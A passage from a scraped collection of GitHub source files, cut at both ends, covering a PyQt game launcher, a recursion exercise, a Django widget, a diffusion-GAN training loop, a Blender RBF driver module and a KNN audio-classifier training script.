mh = size.width(), size.height()\r\n centerW = (width / 2) - (mw / 2)\r\n centerH = (height / 2) - (mh / 2)\r\n self.setPosition(centerW, centerH)\r\n\r\n\r\n def launchGame(self):\r\n self.gWindow = GameWindow()\r\n self.gWindow.showFullScreen()\r\n\r\n\r\nclass GameWindow(QQuickView):\r\n\r\n closed = pyqtSignal()\r\n def __init__(self, parent=None):\r\n super(GameWindow, self).__init__(parent)\r\n\r\n self.setSource(\r\n QUrl.fromLocalFile(\r\n find_data_file(\"GameUI\\Game.qml\")))\r\n self.setResizeMode(QQuickView.SizeRootObjectToView)\r\n\r\n def close(self):\r\n self.destroy()\r\n self.closed.emit()\r\n return True\r\n\r\n def event(self, e):\r\n if e.type() == QEvent.Close:\r\n return self.close()\r\n return QQuickView.event(self, e)\r\n\r\n\r\ndef find_data_file(filename):\r\n if getattr(sys, 'frozen', False):\r\n datadir = os.path.dirname(sys.executable)\r\n else:\r\n datadir = os.path.dirname(__file__)\r\n\r\n return os.path.join(datadir, filename)\r\n\r\nclass QPythonBinding(QQuickItem):\r\n def __init__(self, parent=None):\r\n super(QPythonBinding, self).__init__(parent)\r\n\r\n addElement = pyqtSignal(str, str) //addElement.emit(\"name\", \"value\")\r\n\r\nif __name__ == '__main__':\r\n freeze_support()\r\n import os\r\n import sys\r\n\r\n\r\n app = QGuiApplication(sys.argv)\r\n\r\n qmlRegisterType(Launcher, \"ParanoiaLauncher\", 1, 0, \"App\")\r\n qmlRegisterType(Game, \"ParanoiaEngine\", 1, 0, \"App\")\r\n\r\n view = LauncherWindow()\r\n\r\n\r\n view.show()\r\n\r\n\r\n app.exec_()","repo_name":"Kesanov/PanicStatioin","sub_path":"Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":50589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1636353025","text":"# 핵심: 반으로 쪼갠다\n# return 되는 때 혹은 함수 종료 조건 with 구하고자 하는 값\n\ndef rcp(a,b):\n if cards[a] == cards[b] or cards[a] - cards[b] == 1\\\n or cards[a] - cards[b] == -2:\n return a\n else:\n return b\n \n\ndef winner(start,end):\n if end - start <= 1:\n return rcp(start,end)\n \n g1 = winner(start, (start+end)//2)\n g2 = winner((start+end)//2+1,end)\n return rcp(g1,g2)\n\n\nt = int(input())\nfor tc in range(1,t+1):\n n = int(input())\n cards = list(map(int,input().split()))\n print(f\"#{tc} {winner(0,n-1)+1}\")","repo_name":"GureumKim/23_TIL","sub_path":"MustReview/swea13864.py","file_name":"swea13864.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71698780712","text":"\"\"\"Custom widget field for selecting Gene Filter terms for searches.\"\"\"\n\nimport logging\nimport sys\n\nfrom django import forms\n\nfrom browser.models import Gene\n\nlogger = logging.getLogger(__name__)\n\n\nclass GeneTextarea(forms.widgets.Textarea):\n \"\"\"Base on TextArea widget.\"\"\"\n\n def format_value(self, value):\n \"\"\"Ensure plain text is shown not Gene objects.\"\"\"\n if not value:\n value = \"\"\n\n elif isinstance(value, list):\n # Upon loading search criteria with existing genes saved, widget gets passed a list of Gene objects\n try:\n value = \",\".join([gene.name for gene in value])\n except:\n logger.error(\"Unexpected error handling rendering gene form field: %s\", sys.exc_info())\n\n return super(GeneTextarea, self).format_value(value)\n","repo_name":"MRCIEU/temmpo","sub_path":"browser/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"3795909233","text":"import torch\r\nimport util.util as util\r\nimport ELD_iter_model\r\nimport time\r\nimport os\r\nimport torch.nn.functional as F\r\nimport sys\r\nfrom os.path import join\r\nfrom torchvision.utils import save_image\r\nimport dataset\r\nfrom dataset import lmdb_dataset\r\nfrom util import process\r\nimport noise\r\nimport torch.nn as nn\r\nfrom os.path import join\r\nimport torch.optim as optim\r\nimport torch\r\nimport torch.backends.cudnn as cudnn\r\nimport dataset.sid_dataset as datasets\r\nimport dataset.lmdb_dataset as lmdb_dataset\r\nimport dataset\r\nimport numpy as np\r\nfrom dataset.sid_dataset import worker_init_fn\r\nfrom score_sde.models.discriminator import Discriminator_small, Discriminator_large\r\nfrom score_sde.models.ncsnpp_generator_adagn import NCSNpp\r\nfrom EMA import EMA\r\nimport shutil\r\n\r\ndef broadcast_params(params):\r\n for param in params:\r\n dist.broadcast(param.data, src=0)\r\n\r\ndef copy_source(file, output_dir):\r\n shutil.copyfile(file, os.path.join(output_dir, os.path.basename(file)))\r\n\r\nclass Network(object):\r\n def __init__(self, rank, opt):\r\n self.opt = opt\r\n self.writer = None\r\n self.model = None\r\n self.best_val_loss = 1e6\r\n self.__setup(rank)\r\n\r\n def __setup(self, rank):\r\n torch.manual_seed(self.opt.seed + rank)\r\n torch.cuda.manual_seed(self.opt.seed + rank)\r\n torch.cuda.manual_seed_all(self.opt.seed + rank)\r\n device = torch.device('cuda:{}'.format(rank))\r\n self.basedir = join('checkpoints', self.opt.name)\r\n if not os.path.exists(self.basedir):\r\n os.mkdir(self.basedir)\r\n \r\n opt = self.opt\r\n \r\n \"\"\"Model\"\"\"\r\n netG = NCSNpp(self.opt).to(device)\r\n self.netG = netG\r\n self.model = ELD_iter_model.ELDModelIter(self.netG)\r\n self.model.initialize(opt)\r\n if not opt.no_log:\r\n self.writer = util.get_summary_writer(os.path.join(self.basedir, 'logs'))\r\n\r\n def train(self, gpu, rank):\r\n device = torch.device('cuda:{}'.format(rank))\r\n print('\\nEpoch: %d' % self.epoch)\r\n avg_meters = util.AverageMeters()\r\n opt = self.opt\r\n model = self.model\r\n epoch = self.epoch\r\n epoch_start_time = time.time()\r\n batch_size = opt.batch_size\r\n nz = opt.nz #latent dimension\r\n # model.print_optimizer_param()\r\n\r\n cudnn.benchmark = True\r\n\r\n evaldir = './datasets/SID/Sony'\r\n traindir = './datasets/train'\r\n\r\n expo_ratio = [100, 300] # [100, 250, 300]\r\n read_expo_ratio = lambda x: float(x.split('_')[-1][:-5])\r\n # evaluate 15 indoor scenes (but you can also evaluate the performance on the whole dataset)\r\n indoor_ids = dataset.read_paired_fns('./SID_Sony_15_paired.txt')\r\n eval_fns_list = [[(fn[0], fn[1]) for fn in indoor_ids if int(fn[2]) == ratio] for ratio in expo_ratio]\r\n\r\n cameras = ['CanonEOS5D4', 'CanonEOS70D', 'CanonEOS700D', 'NikonD850', 'SonyA7S2']\r\n noise_model = noise.NoiseModel(model=\"P+G+r+u\", include=4)\r\n\r\n repeat = 1 if opt.max_dataset_size is None else 1288 / opt.max_dataset_size\r\n print('[i] repeat:', repeat)\r\n\r\n CRF = None\r\n if opt.crf:\r\n print('[i] enable CRF')\r\n CRF = process.load_CRF()\r\n\r\n if opt.stage_out == 'srgb':\r\n target_data = lmdb_dataset.LMDBDataset(join(traindir, 'SID_Sony_SRGB_CRF.db'))\r\n else:\r\n target_data = lmdb_dataset.LMDBDataset(\r\n join(traindir, 'SID_Sony_Raw.db'),\r\n size=opt.max_dataset_size, repeat=repeat)\r\n if opt.stage_in == 'srgb':\r\n input_data = datasets.ISPDataset(\r\n lmdb_dataset.LMDBDataset(join(traindir, 'SID_Sony_Raw.db')),\r\n noise_maker=noise_model, CRF=CRF)\r\n else:\r\n ## Synthesizing noise on-the-fly by noise model \r\n input_data = datasets.SynDataset(\r\n lmdb_dataset.LMDBDataset(join(traindir, 'SID_Sony_Raw.db')),\r\n noise_maker=noise_model, num_burst=1,\r\n size=opt.max_dataset_size, repeat=repeat, continuous_noise=opt.continuous_noise)\r\n\r\n ## Noise generated offline \r\n # camera = cameras[opt.include]\r\n # input_data = lmdb_dataset.LMDBDataset(\r\n # join(traindir, f'SID_Sony_syn_Raw_{camera}.db'),\r\n # size=opt.max_dataset_size, repeat=repeat)\r\n\r\n train_dataset = datasets.ELDTrainDataset(target_dataset=target_data, input_datasets=[input_data])\r\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset,\r\n num_replicas= self.opt.world_size,\r\n rank=self.opt.rank)\r\n train_loader = torch.utils.data.DataLoader(train_dataset,\r\n batch_size=batch_size,\r\n shuffle=False,\r\n num_workers=4,\r\n pin_memory=True,\r\n sampler=train_sampler,\r\n drop_last = True)\r\n \r\n netD = Discriminator_large(nc = 2*self.opt.num_channels, ngf = self.opt.ngf, \r\n t_emb_dim = opt.t_emb_dim,\r\n act=nn.LeakyReLU(0.2)).to(device)\r\n \r\n broadcast_params(self.netG.parameters())\r\n broadcast_params(netD.parameters())\r\n optimizerD = optim.Adam(netD.parameters(), lr=self.opt.lr_d, betas = (self.opt.beta1, self.opt.beta2))\r\n \r\n optimizerG = optim.Adam(netG.parameters(), lr=self.opt.lr_g, betas = (self.opt.beta1, self.opt.beta2))\r\n \r\n if self.opt.use_ema:\r\n optimizerG = EMA(optimizerG, ema_decay=opt.ema_decay)\r\n \r\n schedulerG = torch.optim.lr_scheduler.CosineAnnealingLR(optimizerG, self.opt.num_epoch, eta_min=1e-5)\r\n schedulerD = torch.optim.lr_scheduler.CosineAnnealingLR(optimizerD, self.opt.num_epoch, eta_min=1e-5)\r\n\r\n netG = nn.parallel.DistributedDataParallel(netG, device_ids=[gpu])\r\n netD = nn.parallel.DistributedDataParallel(netD, device_ids=[gpu])\r\n\r\n exp = opt.exp\r\n parent_dir = \"./saved_info/dd_gan/{}\".format(opt.dataset)\r\n\r\n exp_path = os.path.join(parent_dir,exp)\r\n if rank == 0:\r\n if not os.path.exists(exp_path):\r\n os.makedirs(exp_path)\r\n copy_source(__file__, exp_path)\r\n shutil.copytree('score_sde/models', os.path.join(exp_path, 'score_sde/models'))\r\n # 是否接着训练\r\n if self.opt.resume:\r\n checkpoint_file = os.path.join(exp_path, 'content.pth')\r\n checkpoint = torch.load(checkpoint_file, map_location=device)\r\n init_epoch = checkpoint['epoch']\r\n epoch = init_epoch\r\n netG.load_state_dict(checkpoint['netG_dict'])\r\n # load G\r\n \r\n optimizerG.load_state_dict(checkpoint['optimizerG'])\r\n schedulerG.load_state_dict(checkpoint['schedulerG'])\r\n # load D\r\n netD.load_state_dict(checkpoint['netD_dict'])\r\n optimizerD.load_state_dict(checkpoint['optimizerD'])\r\n schedulerD.load_state_dict(checkpoint['schedulerD'])\r\n global_step = checkpoint['global_step']\r\n print(\"=> loaded checkpoint (epoch {})\"\r\n .format(checkpoint['epoch']))\r\n else:\r\n global_step, epoch, init_epoch = 0, 0, 0\r\n \r\n for epoch in range(init_epoch, opt.num_epoch+1):\r\n train_sampler.set_epoch(epoch)\r\n for i, data in enumerate(train_loader):\r\n for p in netD.parameters(): \r\n p.requires_grad = True \r\n\r\n model.set_input(data, mode='train')\r\n latent_z = torch.randn(batch_size, nz, device=device)\r\n output_list, target_list, ratio_list = model.forward(train_loader, opt.iter_num, latent_z)\r\n iter_num=len(ratio_list)-1 if not isinstance(ratio_list, torch.Tensor) else ratio_list.shape[1]-1\r\n netD.zero_grad()\r\n errD_real_total = 0\r\n for i in range(iter_num):\r\n target_list[i].requires_grad = True\r\n D_real = netD(target_list[i], i/iter_num, target_list[i+1].detach()).view(-1)\r\n errD_real = F.softplus(-D_real)\r\n errD_real = errD_real.mean()\r\n errD_real_total += errD_real\r\n errD_real_total.backward(retain_graph=True)\r\n\r\n if opt.lazy_reg is None:\r\n grad_real = torch.autograd.grad(\r\n outputs=D_real.sum(), inputs=target_list[i], create_graph=True\r\n )[0]\r\n grad_penalty = (\r\n grad_real.view(grad_real.size(0), -1).norm(2, dim=1) ** 2\r\n ).mean()\r\n \r\n \r\n grad_penalty = opt.r1_gamma / 2 * grad_penalty\r\n grad_penalty.backward()\r\n else:\r\n if global_step % opt.lazy_reg == 0:\r\n grad_real = torch.autograd.grad(\r\n outputs=D_real.sum(), inputs=target_list[i], create_graph=True\r\n )[0]\r\n grad_penalty = (\r\n grad_real.view(grad_real.size(0), -1).norm(2, dim=1) ** 2\r\n ).mean()\r\n\r\n \r\n \r\n grad_penalty = opt.r1_gamma / 2 * grad_penalty\r\n grad_penalty.backward()\r\n\r\n \r\n errD_fake_total = 0\r\n for i in range(iter_num):\r\n target_list[i].requires_grad = True\r\n D_real = netD(output_list[i], i/iter_num, output_list[i+1].detach()).view(-1)\r\n errD_fake = F.softplus(-D_real)\r\n errD_fake = errD_fake.mean()\r\n errD_fake_total += errD_fake\r\n errD_fake_total.backward(retain_graph=True)\r\n \r\n \r\n errD = errD_real_total + errD_fake_total\r\n # Update D\r\n optimizerD.step()\r\n\r\n #update G\r\n for p in netD.parameters():\r\n p.requires_grad = False\r\n netG.zero_grad()\r\n errG_total = 0\r\n for i in range(iter_num):\r\n output = netD(output_list[i], ratio_list[i]/np.max(ratio_list), target_list[i+1].detach()).view(-1)\r\n errG = F.softplus(-output)\r\n errG = errG.mean()\r\n errG_total += errG\r\n errG_total.backward() \r\n optimizerG.step() \r\n\r\n global_step += 1\r\n if global_step % 100 == 0:\r\n if rank == 0:\r\n print('epoch {} iteration{}, G Loss: {}, D Loss: {}'.format(epoch,global_step, errG.item(), errD.item()))\r\n\r\n if not opt.no_lr_decay:\r\n \r\n schedulerG.step()\r\n schedulerD.step()\r\n\r\n if rank == 0:\r\n if epoch % 10 == 0:\r\n torchvision.utils.save_image(output_list[-1], os.path.join(exp_path, 'xpos_epoch_{}.png'.format(epoch)), normalize=True)\r\n \r\n \r\n \r\n if opt.save_content:\r\n if epoch % opt.save_content_every == 0:\r\n print('Saving content.')\r\n content = {'epoch': epoch + 1, 'global_step': global_step, 'args': opt,\r\n 'netG_dict': netG.state_dict(), 'optimizerG': optimizerG.state_dict(),\r\n 'schedulerG': schedulerG.state_dict(), 'netD_dict': netD.state_dict(),\r\n 'optimizerD': optimizerD.state_dict(), 'schedulerD': schedulerD.state_dict()}\r\n \r\n torch.save(content, os.path.join(exp_path, 'content.pth'))\r\n \r\n if epoch % opt.save_ckpt_every == 0:\r\n if opt.use_ema:\r\n optimizerG.swap_parameters_with_ema(store_params_in_ema=True)\r\n \r\n torch.save(netG.state_dict(), os.path.join(exp_path, 'netG_{}.pth'.format(epoch)))\r\n if opt.use_ema:\r\n optimizerG.swap_parameters_with_ema(store_params_in_ema=True)\r\n\r\n\r\n # train_loader.reset()\r\n\r\n def eval(self, val_loader, dataset_name, savedir=None, loss_key=None, **kwargs):\r\n iter_num = kwargs.get(\"iter_num\", None)\r\n if iter_num:\r\n print(\"[i] Evaluation using iterartion number of %d\"%iter_num)\r\n avg_meters = util.AverageMeters()\r\n model = self.model\r\n opt = self.opt\r\n with torch.no_grad():\r\n for i, data in enumerate(val_loader): \r\n index = model.eval(data, savedir=savedir, **kwargs)\r\n # print(data['fn'], index)\r\n avg_meters.update(index)\r\n \r\n util.progress_bar(i, len(val_loader), str(avg_meters))\r\n \r\n if not opt.no_log:\r\n util.write_loss(self.writer, join('eval', dataset_name), avg_meters, self.epoch)\r\n \r\n if loss_key is not None:\r\n val_loss = avg_meters[loss_key]\r\n if val_loss < self.best_val_loss: # larger value indicates better\r\n self.best_val_loss = val_loss\r\n print('saving the best model at the end of epoch %d, iters %d' % \r\n (self.epoch, self.iterations))\r\n model.save(label='best_{}_{}'.format(loss_key, dataset_name))\r\n\r\n return avg_meters\r\n\r\n def test(self, test_loader, savedir=None, **kwargs):\r\n model = self.model\r\n opt = self.opt\r\n with torch.no_grad():\r\n for i, data in enumerate(test_loader):\r\n model.test(data, savedir=savedir, **kwargs)\r\n util.progress_bar(i, len(test_loader))\r\n\r\n def set_learning_rate(self, lr):\r\n for optimizer in self.model.optimizers:\r\n print('[i] set learning rate to {}'.format(lr))\r\n util.set_opt_param(optimizer, 'lr', lr)\r\n\r\n @property\r\n def iterations(self):\r\n return self.model.iterations\r\n\r\n @iterations.setter\r\n def iterations(self, i):\r\n self.model.iterations = i\r\n\r\n @property\r\n def epoch(self):\r\n return self.model.epoch\r\n\r\n @epoch.setter\r\n def epoch(self, e):\r\n self.model.epoch = e","repo_name":"mm2319/Test","sub_path":"denoising-diffusion-gan/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":15126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13607557990","text":"\nfrom typing import TYPE_CHECKING, Callable, Dict, Optional, Sequence, Tuple, Union\nfrom functools import partial\nfrom bpy.types import NodeTree, PropertyGroup\nfrom bpy.props import BoolProperty, EnumProperty, PointerProperty, StringProperty\nfrom rbf_drivers.api.pose_data import POSE_DATA_CONTAINER_TYPE_SIZES\nfrom .mixins import Symmetrical\nfrom .pose_data_ import PoseDataFrame\nfrom .input import InputRotationAxisUpdateEvent, InputRotationModeUpdateEvent\nfrom .inputs import Inputs\nfrom .poses import PoseNewEvent, Poses\nfrom .outputs import RBFDriverOutputs\nfrom ..app.events import dataclass, dispatch_event, event_handler, Event\nfrom ..app.utils import (\n euler_to_quaternion,\n euler_to_swing_twist_x,\n euler_to_swing_twist_y,\n euler_to_swing_twist_z,\n quaternion_to_axis_angle,\n quaternion_to_euler,\n quaternion_to_swing_twist_x,\n quaternion_to_swing_twist_y,\n quaternion_to_swing_twist_z,\n swing_twist_x_to_euler,\n swing_twist_y_to_euler,\n swing_twist_z_to_euler,\n swing_twist_x_to_quaternion,\n swing_twist_y_to_quaternion,\n swing_twist_z_to_quaternion,\n swing_twist_x_to_swing_twist_y,\n swing_twist_x_to_swing_twist_z,\n swing_twist_y_to_swing_twist_x,\n swing_twist_y_to_swing_twist_z,\n swing_twist_z_to_swing_twist_x,\n swing_twist_z_to_swing_twist_y,\n transform_matrix,\n transform_target,\n )\nif TYPE_CHECKING:\n from bpy.types import Context\n\nROTATION_CONVERSION_LUT: Dict[str, Dict[str, Optional[Callable]]] = {\n 'EULER': {\n 'EULER' : None,\n 'SWING' : euler_to_quaternion,\n 'TWIST_X' : partial(euler_to_swing_twist_x, quaternion=True),\n 'TWIST_Y' : partial(euler_to_swing_twist_y, quaternion=True),\n 'TWIST_Z' : partial(euler_to_swing_twist_z, quaternion=True),\n 'QUATERNION': euler_to_quaternion,\n },\n 'SWING': {\n 'EULER' : quaternion_to_euler,\n 'SWING' : None,\n 'TWIST_X' : partial(quaternion_to_swing_twist_x, quaternion=True),\n 'TWIST_Y' : partial(quaternion_to_swing_twist_y, quaternion=True),\n 'TWIST_Z' : partial(quaternion_to_swing_twist_z, quaternion=True),\n 'QUATERNION': None,\n },\n 'TWIST_X': {\n 'EULER' : swing_twist_x_to_euler,\n 'SWING' : swing_twist_x_to_quaternion,\n 'TWIST_X' : None,\n 'TWIST_Y' : swing_twist_x_to_swing_twist_y,\n 'TWIST_Z' : swing_twist_x_to_swing_twist_z,\n 'QUATERNION': swing_twist_x_to_quaternion,\n },\n 'TWIST_Y': {\n 'EULER' : swing_twist_y_to_euler,\n 'SWING' : swing_twist_y_to_quaternion,\n 'TWIST_X' : swing_twist_y_to_swing_twist_x,\n 'TWIST_Y' : None,\n 'TWIST_Z' : swing_twist_y_to_swing_twist_z,\n 'QUATERNION': swing_twist_y_to_quaternion,\n },\n 'TWIST_Z': {\n 'EULER' : swing_twist_z_to_euler,\n 'SWING' : swing_twist_z_to_quaternion,\n 'TWIST_X' : swing_twist_z_to_swing_twist_x,\n 'TWIST_Y' : swing_twist_z_to_swing_twist_y,\n 'TWIST_Z' : None,\n 'QUATERNION': swing_twist_z_to_quaternion,\n },\n 'QUATERNION': {\n 'EULER' : quaternion_to_euler,\n 'SWING' : None,\n 'TWIST_X' : partial(quaternion_to_swing_twist_x, quaternion=True),\n 'TWIST_Y' : partial(quaternion_to_swing_twist_y, quaternion=True),\n 'TWIST_Z' : partial(quaternion_to_swing_twist_z, quaternion=True),\n 'QUATERNION': None,\n }\n }\n\nDRIVER_TYPE_ITEMS = [\n ('NONE' , \"Generic\" , \"\", 'DRIVER' , 0),\n ('SHAPE_KEY' , \"Shape Keys\", \"\", 'SHAPEKEY_DATA', 1),\n ]\n\nDRIVER_TYPE_INDEX = [\n item[0] for item in DRIVER_TYPE_ITEMS\n ]\n\nDRIVER_TYPE_TABLE = {\n item[0]: item[4] for item in DRIVER_TYPE_ITEMS\n }\n\nDRIVER_TYPE_ICONS = {\n item[0]: item[3] for item in DRIVER_TYPE_ITEMS\n }\n\n\n@dataclass(frozen=True)\nclass DriverNameUpdateEvent(Event):\n driver: 'RBFDriver'\n value: str\n\n\ndef driver_name_update_handler(driver: 'RBFDriver', _: 'Context') -> None:\n dispatch_event(DriverNameUpdateEvent(driver, driver.name))\n\n\ndef driver_symmetry_lock(driver: 'RBFDriver') -> bool:\n return driver.get(\"symmetry_lock\", False)\n\n\ndef driver_type(driver: 'RBFDriver') -> int:\n return driver.get(\"type\", 0)\n\n\nclass RBFDriver(Symmetrical, PropertyGroup):\n '''Radial basis function driver'''\n\n nodetree_internal__: PointerProperty(\n type=NodeTree,\n options={'HIDDEN'}\n )\n\n data_frame: PointerProperty(\n name=\"Data\",\n description=\"\",\n type=PoseDataFrame,\n options=set()\n )\n\n @property\n def icon(self) -> str:\n \"\"\"The RBF driver icon (read-only)\"\"\"\n return DRIVER_TYPE_ICONS[self.type]\n\n inputs: PointerProperty(\n name=\"Inputs\",\n description=\"Collection of RBF driver inputs\",\n type=Inputs,\n options=set()\n )\n\n outputs: PointerProperty(\n name=\"Outputs\",\n description=\"Collection of RBF driver outputs\",\n type=RBFDriverOutputs,\n options=set()\n )\n\n name: StringProperty(\n name=\"Name\",\n description=\"Unique RBF driver name\",\n options=set(),\n update=driver_name_update_handler,\n )\n\n poses: PointerProperty(\n name=\"Poses\",\n description=\"Collection of RBF driver poses\",\n type=Poses,\n options=set()\n )\n\n symmetry_lock: BoolProperty(\n name=\"Symmetry Lock\",\n description=\"Prevents symmetry property changes from infinite regression (internal-use)\",\n get=driver_symmetry_lock,\n options={'HIDDEN'}\n )\n\n type: EnumProperty(\n name=\"Type\",\n description=\"The RBF driver type (read-only)\",\n items=DRIVER_TYPE_ITEMS,\n get=driver_type,\n options=set()\n )\n\n def __init__(self, type: str, name: Optional[str]=\"\", mirror: Optional['RBFDriver']=None) -> None:\n assert mirror is None or (isinstance(mirror, RBFDriver)\n and mirror.id_data == self.id_data\n and mirror != self)\n\n self[\"type\"] = DRIVER_TYPE_TABLE[type]\n if name:\n self.name = name\n\n if mirror:\n self[\"symmetry_identifier\"] = mirror.identifier\n mirror[\"symmetry_identifier\"] = self.identifier\n\n def __repr__(self) -> str:\n return f'{self.__class__.__name__}(type=\"{self.type}\", name=\"{self.name}\")'\n\n def __str__(self) -> str:\n path: str = self.path_from_id()\n path = path.replace(\".internal__\", \"\")\n return f'{self.__class__.__name__} @ bpy.data.objects[\"{self.id_data.name}\"].{path}'\n\n\ndef input_target(input_: 'Input') -> Optional[Union['ID', 'PoseBone']]:\n target = input_.object\n if target:\n if (input_.type in {'LOCATION', 'ROTATION', 'SCALE'}\n and target.type == 'ARMATURE'\n and input_.bone_target):\n target = target.pose.bones.get(input_.bone_target)\n elif input_.id_type != 'OBJECT':\n target = target.data if target.type == input_.id_type else target.data\n return \n\n\ndef read_input(input_: 'Input') -> Tuple[str, Optional[Union[float, Sequence[float]]]]:\n type_ = input_.type\n dtype = 'FLOAT'\n value = None\n if type_ in {'LOCATION', 'ROTATION', 'SCALE'}:\n if type_ == 'LOCATION':\n dtype = 'TRANSLATION'\n elif type_ == 'ROTATION':\n pass\n else:\n dtype == 'QUATERNION'\n target = transform_target(input_, input_.bone_target)\n if target:\n matrix = transform_matrix(target, input_.transform_space)\n if type_ == 'LOCATION':\n dtype = 'TRANSLATION'\n value = matrix.to_translation()\n elif type_ == 'SCALE':\n dtype = type_\n value = matrix.to_scale()\n else:\n rmode = input_.rotation_mode\n dtype = 'QUATERNION'\n value = matrix.to_quaternion()\n if rmode == 'EULER':\n dtype = rmode\n value = value.to_euler(input_.rotation_order)\n elif rmode == 'AXIS_ANGLE':\n dtype = rmode\n value = value.to_axis_angle()\n\n return dtype, value\n\n\n\n@event_handler(PoseNewEvent)\ndef on_pose_new(event: PoseNewEvent) -> None:\n pose = event.pose\n driver = pose.driver\n for input_ in driver.inputs:\n pose.inputs.internal__.add().__init__(*read_input(input_))\n for output in driver.outputs:\n pose.outputs.internal__.add().__init__(*read_output(output))\n\n\n@event_handler(InputRotationModeUpdateEvent)\ndef on_input_rotation_mode_update(event: InputRotationModeUpdateEvent) -> None:\n input_ = event.input\n if input_.type == 'ROTATION':\n prevmode = event.previous_value\n currmode = event.value\n if prevmode == 'TWIST': prevmode = f'TWIST_{input_.rotation_axis}'\n if currmode == 'TWIST': currmode = f'TWIST_{input_.rotation_axis}'\n prevtype = prevmode\n currtype = currmode\n if prevtype in {'SWING', 'TWIST'}: prevtype = f'SWING_TWIST_{input_.rotation_axis}'\n if currtype in {'SWING', 'TWIST'}: currtype = f'SWING_TWIST_{input_.rotation_axis}'\n convert = ROTATION_CONVERSION_LUT[prevmode][currmode]\n if convert:\n size = POSE_DATA_CONTAINER_TYPE_SIZES[prevtype]\n for pose in event.input.driver.poses:\n data = pose.inputs.get(event.input)\n if data and len(data) == size:\n data.__init__(currtype, convert(tuple(data)))\n\n\n@event_handler(InputRotationAxisUpdateEvent)\ndef on_input_rotation_axis_update(event: InputRotationAxisUpdateEvent) -> None:\n input_ = event.input\n if input_.type == 'ROTATION':\n mode = input_.rotation_mode\n if mode in {'SWING', 'TWIST'}:\n prev = f'{mode}_{event.previous_value}'\n curr = f'{mode}_{event.value}'\n convert = ROTATION_CONVERSION_LUT[prev][curr]\n if convert:\n type_ = f'SWING_TWIST_{event.value}'\n for pose in input_.driver.poses:\n data = pose.inputs.get(input_)\n if data and len(data) == 4:\n data.__init__(type_, convert(tuple(data)))","repo_name":"jamesvsnowden/bl_rbf_drivers","sub_path":"rbf_drivers/api/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":10393,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"29545525450","text":"# DSP - Training Module\n\nimport librosa\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pa\nimport time\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split #remove later\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import mean_squared_error\nimport feature_extraction as fe\n\n# Hyperparameter variables go here\nk = -1 #k no. of neighbours. Variables set to -1 have no yet been initialised\nk_lim = 20\nleaf_size = -1 #Leaf size for model\nl_lim = 30\np = -1 #Distance measurement \"p\"\n\ntic = time.perf_counter() #Start timer for feature extraction\n\n# Real data for X and y\npath = \"samples_large\" #Directory for training data\npathtest = \"testdata\" #Directory for \"test data\" (will be split into validate and test)\ny_train = fe.read_instruments(path)\nX_train = [fe.get_features(filename) for filename in fe.get_wav_files(path)]\nprint(\"Training data loaded in.\")\n\n# Data collection\ny_vali = fe.read_instruments(pathtest)\nX_vali = [fe.get_features(filename) for filename in fe.get_wav_files(pathtest)]\nprint(\"Validate data loaded in.\")\n\n#X_train, X_test, y_train, y_test = train_test_split(X_train, y_train, test_size=0.20)\n#X_train, X_vali, y_train, y_vali = train_test_split(X_train, y_train, test_size=0.25)\n# This block of code is used when the training data is too small to warrant use of full test set\n# In this case we instead partition the training set 60/20/20\n\nX_vali, X_test, y_vali, y_test = train_test_split(X_vali, y_vali, test_size=0.30) #Split validation/test 70/30\nprint(\"Test data loaded in.\")\nscaler = StandardScaler() #Perform some scaling on the data\n# Note: Does not affect accuracy but its good practice so its been left in\nscaler.fit(X_train)\nX_train = scaler.transform(X_train)\nX_vali = scaler.transform(X_vali)\nX_test = scaler.transform(X_test)\nprint(\"X_train: \", len(X_train), \"\\nX_vali: \", len(X_vali), \"\\nX_test: \", len(X_test))\ntoc = time.perf_counter()\ntime_data = round((toc-tic),4) #Record feature extraction (and data partitioning time)\n# Effectively the \"time taken to prepare data\"\n\ntic = time.perf_counter() #Start training clock\n#Validation cycle (k)\naccuracy_k = []\naccMax = 0\nfor i in range (1, k_lim):\n kmeans = KNeighborsClassifier(n_neighbors=i) #Set up a model for given k\n kmeans.fit(X_train, y_train)\n y_pred = kmeans.predict(X_vali) #Predict using validation set\n accTemp = (np.sum(y_pred == y_vali)/len(y_vali))*100 #Accuracy is correct guesses/total\n if(accTemp > accMax): #If this is the highest accuracy noted, update the optimal k value (used later)\n k = i\n accMax = accTemp #Update max\n accuracy_k.append(round(accTemp,2)) #Track accuracy history\n\n#Validation cycle (leaves)\naccuracy_l = []\naccMax = 0\nfor i in range (1, l_lim):\n kmeans = KNeighborsClassifier(n_neighbors=k, leaf_size=i) #uses optimal k value so we can iterate on progress already made\n kmeans.fit(X_train, y_train)\n y_pred = kmeans.predict(X_vali) #Same as before. Test for each leaf_size limit\n accTemp = (np.sum(y_pred == y_vali)/len(y_vali))*100\n if(accTemp > accMax):\n leaf_size = i\n accMax = accTemp\n accuracy_l.append(round(accTemp,2)) #Track leaf_size accuracy\n\n#Validation cycle (p)\naccuracy_p = []\n# Only looking at two types of distance measurement so no need for a loop\nkmeans = KNeighborsClassifier(n_neighbors=k, leaf_size=leaf_size, p=1)\n# p=1 -> Manhatten\nkmeans.fit(X_train, y_train)\ny_pred = kmeans.predict(X_vali)\nacc1 = (np.sum(y_pred == y_vali)/len(y_vali))*100\naccuracy_p.append(round(acc1, 2))\nkmeans = KNeighborsClassifier(n_neighbors=k, leaf_size=leaf_size, p=2)\n# p=2 -> Euclidean\nkmeans.fit(X_train, y_train)\ny_pred = kmeans.predict(X_vali)\nacc2 = 